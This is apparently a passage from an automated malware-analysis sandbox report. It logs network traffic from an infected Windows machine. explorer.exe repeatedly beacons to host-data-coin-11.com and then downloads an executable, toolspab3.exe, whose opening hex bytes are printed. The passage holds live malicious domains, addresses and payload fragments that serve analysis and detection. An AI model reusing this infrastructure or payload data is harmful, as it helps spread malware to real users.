                  Dec 28, 2021 13:54:49.753607988 CET4978780192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:49.753669977 CET4978780192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:49.934385061 CET804978747.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:50.092963934 CET4978880192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:50.272917986 CET804978847.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:50.273037910 CET4978880192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:50.273237944 CET4978880192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:50.273282051 CET4978880192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:50.452949047 CET804978847.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:50.826272011 CET804978847.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:50.826400995 CET4978880192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:50.826649904 CET4978880192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:50.854266882 CET4979080192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:51.006403923 CET804978847.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:51.034526110 CET804979047.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:51.034646034 CET4979080192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:51.034786940 CET4979080192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:51.034816980 CET4979080192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:51.214282990 CET804979047.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:51.214313030 CET804979047.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:51.603113890 CET804979047.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:51.604226112 CET4979080192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:51.604536057 CET4979080192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:51.633146048 CET4979180192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:51.784141064 CET804979047.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:51.805850029 CET804979147.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:51.806391954 CET4979180192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:51.806477070 CET4979180192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:51.806488037 CET4979180192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:51.979099035 CET804979147.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:52.354857922 CET804979147.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:52.354892969 CET804979147.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:52.354963064 CET4979180192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:52.355257988 CET4979180192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:52.385899067 CET4979280192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:52.527923107 CET804979147.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:52.559302092 CET804979247.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:52.559458971 CET4979280192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:52.559643030 CET4979280192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:52.559665918 CET4979280192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:52.732996941 CET804979247.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:53.118556976 CET804979247.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:53.118628979 CET804979247.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:53.118824005 CET4979280192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:53.119051933 CET4979280192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:53.292340994 CET804979247.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:53.444197893 CET4979380192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:53.624084949 CET804979347.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:53.624197960 CET4979380192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:53.624316931 CET4979380192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:53.624475956 CET4979380192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:53.804936886 CET804979347.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:53.804991007 CET804979347.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:54.195750952 CET804979347.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:54.196724892 CET4979380192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:54.196980000 CET4979380192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:54.208082914 CET4979480192.168.2.4185.186.142.166
                  Dec 28, 2021 13:54:54.262986898 CET8049794185.186.142.166192.168.2.4
                  Dec 28, 2021 13:54:54.376764059 CET804979347.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:54.776233912 CET4979480192.168.2.4185.186.142.166
                  Dec 28, 2021 13:54:54.830984116 CET8049794185.186.142.166192.168.2.4
                  Dec 28, 2021 13:54:55.338762045 CET4979480192.168.2.4185.186.142.166
                  Dec 28, 2021 13:54:55.393585920 CET8049794185.186.142.166192.168.2.4
                  Dec 28, 2021 13:54:55.422472954 CET4979580192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:55.598130941 CET804979547.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:55.598421097 CET4979580192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:55.598448038 CET4979580192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:55.598453045 CET4979580192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:55.773916960 CET804979547.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:56.155267954 CET804979547.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:56.155297041 CET804979547.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:56.155812979 CET4979580192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:56.155847073 CET4979580192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:56.182193041 CET4979680192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:56.331476927 CET804979547.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:56.358776093 CET804979647.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:56.358923912 CET4979680192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:56.359143019 CET4979680192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:56.359200001 CET4979680192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:56.535573006 CET804979647.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:56.535619020 CET804979647.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:56.915194988 CET804979647.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:56.915313959 CET4979680192.168.2.447.251.11.252

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Dec 28, 2021 13:54:48.219171047 CET5585453192.168.2.48.8.8.8
                  Dec 28, 2021 13:54:48.238013029 CET53558548.8.8.8192.168.2.4
                  Dec 28, 2021 13:54:48.989533901 CET6454953192.168.2.48.8.8.8
                  Dec 28, 2021 13:54:49.006606102 CET53645498.8.8.8192.168.2.4
                  Dec 28, 2021 13:54:49.761595964 CET6315353192.168.2.48.8.8.8
                  Dec 28, 2021 13:54:50.092185020 CET53631538.8.8.8192.168.2.4
                  Dec 28, 2021 13:54:50.835154057 CET5370053192.168.2.48.8.8.8
                  Dec 28, 2021 13:54:50.853662968 CET53537008.8.8.8192.168.2.4
                  Dec 28, 2021 13:54:51.612792015 CET5172653192.168.2.48.8.8.8
                  Dec 28, 2021 13:54:51.631757021 CET53517268.8.8.8192.168.2.4
                  Dec 28, 2021 13:54:52.366228104 CET5679453192.168.2.48.8.8.8
                  Dec 28, 2021 13:54:52.385042906 CET53567948.8.8.8192.168.2.4
                  Dec 28, 2021 13:54:53.156251907 CET5653453192.168.2.48.8.8.8
                  Dec 28, 2021 13:54:53.443387985 CET53565348.8.8.8192.168.2.4
                  Dec 28, 2021 13:54:55.404691935 CET5662753192.168.2.48.8.8.8
                  Dec 28, 2021 13:54:55.421828985 CET53566278.8.8.8192.168.2.4
                  Dec 28, 2021 13:54:56.162736893 CET5662153192.168.2.48.8.8.8
                  Dec 28, 2021 13:54:56.181586027 CET53566218.8.8.8192.168.2.4
                  Dec 28, 2021 13:54:56.933798075 CET6311653192.168.2.48.8.8.8
                  Dec 28, 2021 13:54:56.952656031 CET53631168.8.8.8192.168.2.4
                  Dec 28, 2021 13:54:57.814192057 CET6407853192.168.2.48.8.8.8
                  Dec 28, 2021 13:54:57.830703974 CET53640788.8.8.8192.168.2.4
                  Dec 28, 2021 13:54:59.701852083 CET6480153192.168.2.48.8.8.8
                  Dec 28, 2021 13:55:00.049293041 CET53648018.8.8.8192.168.2.4
                  Dec 28, 2021 13:56:00.246870995 CET5917253192.168.2.48.8.8.8
                  Dec 28, 2021 13:56:00.569410086 CET53591728.8.8.8192.168.2.4
                  Dec 28, 2021 13:56:01.326704979 CET6242053192.168.2.48.8.8.8
                  Dec 28, 2021 13:56:01.678086996 CET53624208.8.8.8192.168.2.4
                  Dec 28, 2021 13:56:04.660819054 CET5018353192.168.2.48.8.8.8
                  Dec 28, 2021 13:56:04.677397013 CET53501838.8.8.8192.168.2.4
                  Dec 28, 2021 13:56:05.419943094 CET6153153192.168.2.48.8.8.8
                  Dec 28, 2021 13:56:05.796927929 CET53615318.8.8.8192.168.2.4
                  Dec 28, 2021 13:56:06.551572084 CET4922853192.168.2.48.8.8.8
                  Dec 28, 2021 13:56:06.568032026 CET53492288.8.8.8192.168.2.4
                  Dec 28, 2021 13:56:07.308656931 CET5979453192.168.2.48.8.8.8
                  Dec 28, 2021 13:56:07.327295065 CET53597948.8.8.8192.168.2.4
                  Dec 28, 2021 13:56:07.371721983 CET5591653192.168.2.48.8.8.8
                  Dec 28, 2021 13:56:07.388578892 CET53559168.8.8.8192.168.2.4
                  Dec 28, 2021 13:56:08.133531094 CET5275253192.168.2.48.8.8.8
                  Dec 28, 2021 13:56:08.504429102 CET53527528.8.8.8192.168.2.4
                  Dec 28, 2021 13:56:09.252388000 CET6054253192.168.2.48.8.8.8
                  Dec 28, 2021 13:56:09.271675110 CET53605428.8.8.8192.168.2.4
                  Dec 28, 2021 13:56:10.040391922 CET6068953192.168.2.48.8.8.8
                  Dec 28, 2021 13:56:11.048355103 CET6068953192.168.2.48.8.8.8
                  Dec 28, 2021 13:56:12.068723917 CET53606898.8.8.8192.168.2.4
                  Dec 28, 2021 13:56:12.105007887 CET6420653192.168.2.48.8.8.8
                  Dec 28, 2021 13:56:12.122045040 CET53642068.8.8.8192.168.2.4
                  Dec 28, 2021 13:56:13.072597980 CET53606898.8.8.8192.168.2.4

                  ICMP Packets

                  TimestampSource IPDest IPChecksumCodeType
                  Dec 28, 2021 13:56:13.072786093 CET192.168.2.48.8.8.8cff7(Port unreachable)Destination Unreachable

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Dec 28, 2021 13:54:48.219171047 CET192.168.2.48.8.8.80xb6c3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:48.989533901 CET192.168.2.48.8.8.80x43a2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:49.761595964 CET192.168.2.48.8.8.80x2b61Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:50.835154057 CET192.168.2.48.8.8.80x169Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:51.612792015 CET192.168.2.48.8.8.80x46a9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:52.366228104 CET192.168.2.48.8.8.80xbf6aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:53.156251907 CET192.168.2.48.8.8.80xf25fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:55.404691935 CET192.168.2.48.8.8.80x218aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:56.162736893 CET192.168.2.48.8.8.80x459aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:56.933798075 CET192.168.2.48.8.8.80xd74fStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:57.814192057 CET192.168.2.48.8.8.80x8e2bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:59.701852083 CET192.168.2.48.8.8.80xbd60Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:00.246870995 CET192.168.2.48.8.8.80xbc1aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:01.326704979 CET192.168.2.48.8.8.80xbc41Standard query (0)privacytools-foryou-777.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:04.660819054 CET192.168.2.48.8.8.80xaf15Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:05.419943094 CET192.168.2.48.8.8.80xd9c9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:06.551572084 CET192.168.2.48.8.8.80xe7dcStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:07.308656931 CET192.168.2.48.8.8.80x936eStandard query (0)unicupload.topA (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:07.371721983 CET192.168.2.48.8.8.80xce23Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:08.133531094 CET192.168.2.48.8.8.80xc28fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:09.252388000 CET192.168.2.48.8.8.80xa4d1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:10.040391922 CET192.168.2.48.8.8.80x9a19Standard query (0)infinity-cheats.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:11.048355103 CET192.168.2.48.8.8.80x9a19Standard query (0)infinity-cheats.comA (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:12.105007887 CET192.168.2.48.8.8.80x9d33Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Dec 28, 2021 13:54:48.238013029 CET8.8.8.8192.168.2.40xb6c3No error (0)host-data-coin-11.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:49.006606102 CET8.8.8.8192.168.2.40x43a2No error (0)host-data-coin-11.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:50.092185020 CET8.8.8.8192.168.2.40x2b61No error (0)host-data-coin-11.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:50.853662968 CET8.8.8.8192.168.2.40x169No error (0)host-data-coin-11.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:51.631757021 CET8.8.8.8192.168.2.40x46a9No error (0)host-data-coin-11.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:52.385042906 CET8.8.8.8192.168.2.40xbf6aNo error (0)host-data-coin-11.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:53.443387985 CET8.8.8.8192.168.2.40xf25fNo error (0)host-data-coin-11.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:55.421828985 CET8.8.8.8192.168.2.40x218aNo error (0)host-data-coin-11.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:56.181586027 CET8.8.8.8192.168.2.40x459aNo error (0)host-data-coin-11.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:56.952656031 CET8.8.8.8192.168.2.40xd74fNo error (0)data-host-coin-8.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:54:57.830703974 CET8.8.8.8192.168.2.40x8e2bNo error (0)host-data-coin-11.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:55:00.049293041 CET8.8.8.8192.168.2.40xbd60No error (0)host-data-coin-11.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:00.569410086 CET8.8.8.8192.168.2.40xbc1aNo error (0)host-data-coin-11.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:01.678086996 CET8.8.8.8192.168.2.40xbc41No error (0)privacytools-foryou-777.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:04.677397013 CET8.8.8.8192.168.2.40xaf15No error (0)host-data-coin-11.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:05.796927929 CET8.8.8.8192.168.2.40xd9c9No error (0)host-data-coin-11.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:06.568032026 CET8.8.8.8192.168.2.40xe7dcNo error (0)host-data-coin-11.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:07.327295065 CET8.8.8.8192.168.2.40x936eNo error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:07.388578892 CET8.8.8.8192.168.2.40xce23No error (0)host-data-coin-11.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:08.504429102 CET8.8.8.8192.168.2.40xc28fNo error (0)host-data-coin-11.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:09.271675110 CET8.8.8.8192.168.2.40xa4d1No error (0)host-data-coin-11.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:12.068723917 CET8.8.8.8192.168.2.40x9a19Server failure (2)infinity-cheats.comnonenoneA (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:12.122045040 CET8.8.8.8192.168.2.40x9d33No error (0)host-data-coin-11.com47.251.11.252A (IP address)IN (0x0001)
                  Dec 28, 2021 13:56:13.072597980 CET8.8.8.8192.168.2.40x9a19Server failure (2)infinity-cheats.comnonenoneA (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • dbbxvwuoso.com
                    • host-data-coin-11.com
                  • yawyilmlp.com
                  • oabgiwp.net
                  • hwrkvn.net
                  • oskoy.org
                  • yhvtxw.net
                  • kfdyfm.net
                  • jealulibe.org
                  • axnxlm.org
                  • data-host-coin-8.com
                  • mgnuugce.com
                  • kctmodtvj.net
                  • lspsrkslr.org
                  • privacytools-foryou-777.com
                  • clunuonr.net
                  • pebbfc.com
                  • xkoocu.com
                  • unicupload.top
                  • xpkuvjioi.org
                  • nxjfh.org
                  • ithwflphmf.org

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.44978647.251.11.25280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:54:48.415672064 CET1534OUTPOST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://dbbxvwuoso.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 148
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:54:48.974246025 CET1534INHTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:48 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f7 1b b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 19{i+,GO0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.44978747.251.11.25280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:54:49.189124107 CET1535OUTPOST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://yawyilmlp.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 213
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:54:49.753453970 CET1536INHTTP/1.1 200 OK
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:49 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 0
                  Connection: close


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  10192.168.2.44979847.251.11.25280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:54:58.363480091 CET1560OUTPOST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://mgnuugce.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 143
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:54:58.914283037 CET1560INHTTP/1.1 200 OK
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:58 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 0
                  Connection: close


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  11192.168.2.44979947.251.11.25280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:55:00.231923103 CET1561OUTPOST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://kctmodtvj.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 246
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:55:00.794028044 CET1562INHTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:55:00 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 37I:82OR%@_M-\z.TKC0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  12192.168.2.44984447.251.11.25280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:56:00.745909929 CET10446OUTPOST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://lspsrkslr.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 269
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:56:01.319165945 CET10447INHTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:56:01 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 02 e9 1a d1 70 ae 59 4a d9 52 a6 be 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 46I:82OOjpYJRg%XQAc}yc0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  13192.168.2.44984547.251.11.25280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 28, 2021 13:56:01.860596895 CET10447OUTGET /downloads/toolspab3.exe HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Host: privacytools-foryou-777.com
                  Dec 28, 2021 13:56:02.409576893 CET10454INHTTP/1.1 200 OK
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:56:02 GMT
                  Content-Type: application/x-msdos-program
                  Content-Length: 339456
                  Connection: close
                  Last-Modified: Tue, 28 Dec 2021 12:56:02 GMT
                  ETag: W/"52e00-5d43457ecb7e9"
                  Accept-Ranges: bytes
                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 04 b7 bc 92 40 d6 d2 c1 40 d6 d2 c1 40 d6 d2 c1 2f a0 4c c1 51 d6 d2 c1 2f a0 78 c1 2a d6 d2 c1 49 ae 41 c1 43 d6 d2 c1 40 d6 d3 c1 fd d6 d2 c1 2f a0 79 c1 76 d6 d2 c1 2f a0 48 c1 41 d6 d2 c1 2f a0 4f c1 41 d6 d2 c1 52 69 63 68 40 d6 d2 c1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 1b b4 65 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ee 03 00 00 20 09 00 00 00 00 00 b0 3d 02 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 0d 00 00 04 00 00 93 13 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc eb 03 00 28 00 00 00 00 90 0c 00 88 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 24 21 00 00 70 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4e ed 03 00 00 10 00 00 00 ee 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 6f 08 00 00 00 04 00 00 8c 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 65 6a 65 76 75 00 05 00 00 00 00 70 0c 00 00 02 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 6f 7a 69 00 00 00 93 0d 00 00 00 80 0c 00 00 0e 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 62 00 00 00 90 0c 00 00 64 00 00 00 8e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ee 3b 00 00 00 00 0d 00 00 3c 00 00 00 f2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc ee 03 00 f8 ee 03 00 0c ef 03 00 1e ef 03 00 30 ef 03 00 46 ef 03 00 56 ef 03 00 6c ef 03 00 7c ef 03 00 98 ef 03 00 ac ef 03 00 c0 ef 03 00 d6 ef 03
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$@@@/LQ/x*IAC@/yv/HA/OARich@PELe` =@@(b$!p@.textN `.dataho@.pejevup~@.dozi@.rsrcbd@@.reloc;<@B0FVl|


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  14192.168.2.44985447.251.11.25280C:\Windows\explorer.exe
